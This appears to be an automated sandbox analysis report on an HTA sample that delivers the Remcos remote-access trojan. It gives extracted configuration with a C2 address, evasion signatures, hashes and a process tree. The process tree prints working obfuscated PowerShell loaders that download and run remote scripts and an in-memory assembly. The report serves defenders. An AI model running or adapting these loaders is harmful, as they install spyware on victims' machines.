Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250128-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250128-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
01-02-2025 16:46
Static task
static1
Behavioral task
behavioral1
Sample
7a27c246967ee9e339939078beca4363d45d663aefb9c9b49fe891136b70e4ae.hta
Resource
win10ltsc2021-20250128-en
General
-
Target
7a27c246967ee9e339939078beca4363d45d663aefb9c9b49fe891136b70e4ae.hta
-
Size
15KB
-
MD5
91646dc944a9b144775945568f2acea3
-
SHA1
10b33643c23d1ed56a9702c16c030f851215fa2a
-
SHA256
7a27c246967ee9e339939078beca4363d45d663aefb9c9b49fe891136b70e4ae
-
SHA512
3a5e252523306c2bf0928987cd2bd1af6803995962424a2873caa965a5f4b7a90bbbe6128600c85889944a1bd297f27ec792ce3afb563ae0afc8d46e717e847c
-
SSDEEP
48:3PCAuD4bcMcMzn4bcM4ken2tsdz2BAvNupkfxRfvCFBlTEwQ4X4bcMeKdPG:/CVot4sdqBk0pcaW+
Malware Config
Extracted
remcos
RemoteHost
172.245.123.12:8690
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-M39SJI
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 1 784 powershell.exe 4 2452 powershell.exe 5 2452 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2856 cmd.exe 784 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2994328021-2832906384-2448483822-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-2994328021-2832906384-2448483822-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 2452 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2452 set thread context of 4124 2452 powershell.exe 87 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 784 powershell.exe 784 powershell.exe 2452 powershell.exe 2452 powershell.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4124 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 784 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 4312 taskmgr.exe Token: SeSystemProfilePrivilege 4312 taskmgr.exe Token: SeCreateGlobalPrivilege 4312 taskmgr.exe Token: 33 4312 taskmgr.exe Token: SeIncBasePriorityPrivilege 4312 taskmgr.exe -
Suspicious use of FindShellTrayWindow 45 IoCs
pid Process 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe -
Suspicious use of SendNotifyMessage 45 IoCs
pid Process 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe 4312 taskmgr.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4124 CasPol.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 1956 wrote to memory of 2856 1956 mshta.exe 79 PID 1956 wrote to memory of 2856 1956 mshta.exe 79 PID 1956 wrote to memory of 2856 1956 mshta.exe 79 PID 2856 wrote to memory of 784 2856 cmd.exe 81 PID 2856 wrote to memory of 784 2856 cmd.exe 81 PID 2856 wrote to memory of 784 2856 cmd.exe 81 PID 784 wrote to memory of 2460 784 powershell.exe 82 PID 784 wrote to memory of 2460 784 powershell.exe 82 PID 784 wrote to memory of 2460 784 powershell.exe 82 PID 2460 wrote to memory of 2908 2460 csc.exe 83 PID 2460 wrote to memory of 2908 2460 csc.exe 83 PID 2460 wrote to memory of 2908 2460 csc.exe 83 PID 784 wrote to memory of 228 784 powershell.exe 84 PID 784 wrote to memory of 228 784 powershell.exe 84 PID 784 wrote to memory of 228 784 powershell.exe 84 PID 228 wrote to memory of 2452 228 WScript.exe 85 PID 228 wrote to memory of 2452 228 WScript.exe 85 PID 228 wrote to memory of 2452 228 WScript.exe 85 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87 PID 2452 wrote to memory of 4124 2452 powershell.exe 87
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\7a27c246967ee9e339939078beca4363d45d663aefb9c9b49fe891136b70e4ae.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOwErShEll.EXe -Ex BYpaSs -NOP -w 1 -c deViCeCREDENtiAldEPlOyMenT ; INvOKe-expreSsion($(iNVOKe-EXpResSIOn('[syStEm.TeXt.ENcoDinG]'+[chAR]0X3a+[char]0X3A+'utF8.gETsTRInG([sySTEM.CONVeRT]'+[CHar]58+[cHar]0X3a+'frOmBAsE64StRiNg('+[CHAr]34+'JFBkMSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJERWZJbml0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZuTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDZVdwV3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT09vbWdGdXFULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZZmssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGFmREQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqUkRwemwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFBkMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjg2Lzc0NC9uZXd0aGluZ3NhcmViZXR0ZXJ3YXl0b2dldG1lYmFja2dvb2R0aGluZ3NhbHdheXMuZ0lGIiwiJGVudjpBUFBEQVRBXG5ld3RoaW5nc2FyZWJldHRlcndheXRvZ2V0bWViYWNrZ29vZHRoaW5nc2Fsd2F5LnZicyIsMCwwKTtzdEFSdC1TTEVlUCgzKTtJbnZPa0UtRXhwckVTc2lPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmV3dGhpbmdzYXJlYmV0dGVyd2F5dG9nZXRtZWJhY2tnb29kdGhpbmdzYWx3YXkudmJzIg=='+[cHaR]0x22+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOwErShEll.EXe -Ex BYpaSs -NOP -w 1 -c deViCeCREDENtiAldEPlOyMenT ; INvOKe-expreSsion($(iNVOKe-EXpResSIOn('[syStEm.TeXt.ENcoDinG]'+[chAR]0X3a+[char]0X3A+'utF8.gETsTRInG([sySTEM.CONVeRT]'+[CHar]58+[cHar]0X3a+'frOmBAsE64StRiNg('+[CHAr]34+'JFBkMSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRU1CZXJERWZJbml0SU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1PTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGZuTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDZVdwV3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT09vbWdGdXFULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZZmssSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcGFmREQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJqUkRwemwiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVTUEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFBkMTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjg2Lzc0NC9uZXd0aGluZ3NhcmViZXR0ZXJ3YXl0b2dldG1lYmFja2dvb2R0aGluZ3NhbHdheXMuZ0lGIiwiJGVudjpBUFBEQVRBXG5ld3RoaW5nc2FyZWJldHRlcndheXRvZ2V0bWViYWNrZ29vZHRoaW5nc2Fsd2F5LnZicyIsMCwwKTtzdEFSdC1TTEVlUCgzKTtJbnZPa0UtRXhwckVTc2lPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmV3dGhpbmdzYXJlYmV0dGVyd2F5dG9nZXRtZWJhY2tnb29kdGhpbmdzYWx3YXkudmJzIg=='+[cHaR]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pmsu00k0\pmsu00k0.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA7C9.tmp" "c:\Users\Admin\AppData\Local\Temp\pmsu00k0\CSC1F9CB6D1DC704CD8B177FE5FD5E5C0CF.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:2908
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingsarebetterwaytogetmebackgoodthingsalway.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:228 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AYQB3AGcAbgBpAGgAdAB5AHIAZQB2AGUAcgBvAGYAZABvAG8AZwBlAGgAcwAvADQANAA3AC8ANgA4AC4AMwAyADEALgA1ADQAMgAuADIANwAxAC8ALwA6AHAAdAB0AGgAJwA7ACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQAIAA9ACAAJABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAaQBtAGEAZwBlAFUAcgBsACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAZQBzAC4AYwBsAG8AdQBkAGkAbgBhAHIAeQAuAGMAbwBtAC8AZABhAHgAdwB1AGEANgAzAHkALwBpAG0AYQBnAGUALwB1AHAAbABvAGEAZAAvAHYAMQA3ADMANwA2ADkANgAxADcAMQAvAGgAZQBrAGUAMgBwAG0AdABlAHUAdwA4AHMAcQBzAHAAbABoAGsAbAAuAGoAcABnACcAOwAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACQAaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABpAG0AYQBnAGUAQgB5AHQAZQBzACkAOwAkAHMAdABhAHIAdABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8AUwBUAEEAUgBUAD4APgAnADsAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAkAGUAbgBkAEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAZQBuAGQARgBsAGEAZwApADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACAAPQAgACQAZQBuAGQASQBuAGQAZQB4ACAALQAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7ACQAdAB5AHAAZQAgAD0AIABbAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADEALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAbQBhAGkAbgAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgAEAAKAAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACwAJwBmAGEAbABzAGUAJwAsACcAQwBhAHMAUABvAGwAJwAsACcAZgBhAGwAcwBlACcAKQApAA==')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2452 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4124
-
-
-
-
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4312
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
180B
MD5b31162eedb6d473eb66bc2880e0ad358
SHA1f6d8b3ff7c0c2d0fe0a66b7269a59b618bd3b076
SHA256dc156a5a03c9aaf084a624b41177b8674e05f69d02ce06add2bdc71f1471fa6e
SHA5129207930ec36c00b577efcfdeadc27286d21eb7bd35f3776ea5f35fe64b24cfde1087b87b051c3a5b2926a17d9666c25045e4c7ef78f88f27b7688c823c2b862e
-
Filesize
2KB
MD51c76d197161c792962a761c2355cee43
SHA123c15e482cc7aaae05e583f18eeb9c35d0dfa4d5
SHA256751c46fdbbe8b95a652a711aa06bbf03194c74f5654ecfea65c63ff87622baca
SHA512911c9d6b31b8c527002378c32a12cb97ba4eb211ae7c59820319fbdb059ec26880328b1b191e9005f46c2a31e9ec4a8551d9e45c2d6a46417d16333d1776f055
-
Filesize
19KB
MD5d3e6528700284b1b98a9a197c3e8352f
SHA1a113238d13bccbeb740c48e0123751b752c1a41d
SHA256065b438adb3374251021076f8b003e2319c9f474ccd9119d839e1c746d59603c
SHA512a625b8ff1662f876fa802e1c7f1435825a34bca3fee840ff42ee1a83e1894432ebbc3c51582f3e554dfa173d9fcae387e6c966f0594e49adc3f7506cd7844d90
-
Filesize
1KB
MD54a91df3208b8d5d92d83734fb5f8d5ce
SHA194314a3223a1ea98f1db2928766ab8a26f70d1b8
SHA25618a7a9a37ae8a1ba929586ffe5a2548d45c35df0c8a2741d2f9c45cac0900324
SHA51285d17cb73d6abee5c5fe7e3fd3a56733b5e324f09688c0735c0ff814c120a93b1c009b0f69d223473f698ee29ee44b2de28f725e321dc43f0e0bbb1ba97ebbbe
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD52baad99e393d78805b9cb7d25169b16b
SHA1d1eeb9baf604033222bc25462e0597f3dac3b24c
SHA256082ae40a6d98a5bb946863a2d0177c8f07b5e65145e677a9f2a9ca4a34bb20a0
SHA512e6f5f5bd226b7303867aa2398eb3a49387b677863a1dabffbbc3c41d2c55aba33fcd697c1da6e3ac64b40d07818519b5480e6b272c06b88f34b4acf8b4e2e281
-
Filesize
223KB
MD589fcf06221c1830a49699337619dede8
SHA1271b9e22164d51304be579097a14b63b49b6779e
SHA256535ce1889084523a7a1c04a570ca2000b924d5289cd1276146665c531ee2157e
SHA5124842ee71b17d3848ec0517c3953eaae90ed0f9ac8249f20306c891e3954021dc648c97ac9bf2c2cea58df669fd492e922300bb229fcacefadedee30d72a733e4
-
Filesize
652B
MD59b1a2e2f030dcd8e638a3451663b2a88
SHA184a167926e4a98d2c51276911c263b7d640400f8
SHA256d440b1d0ec2156049f538ef6c82effa74ae4313d07efa6c59573fe839b71487b
SHA51241550923cb86fc3b66f159dcb487faaa139fe8ac2f89c071cede84ac375f4d58b15572810bcdfd1abfd5687564c7d807b44c6d2c12b55d8d60b310efbf4ae59a
-
Filesize
466B
MD5255c71170d7a96f4371816ea477745d5
SHA1945c5a56ca2eced03c95d864876c30cbe8cc5e1b
SHA256038969e25a28b8206b3a16c9b2ee846f9d55c8a2c4e5e12be7e0dc7f6e2a8a75
SHA512e0972176b389e3689c22d3db51b16d4f3fc5f1015bab41e735f39f1ffa7de8660d61fe666ddc2c96430800d7508a23f150e17fb87f938359fcfe20474f9f3ab1
-
Filesize
369B
MD57681fc920a61942b3548177e2deea325
SHA1edc658c46bd1e19420a65089025726c9f55c5e40
SHA256d676c8062a246e33e4471614034b1ee6776930bdb6b7d48019e1a251511404b6
SHA5129b1033409723bb561bf12870c8e25a7a6c5fc079b92fde045568410f3454a034dcaa14eb15ed777a117e2a429597c82e9ab81eeeb0a01959547a9f414e3751b1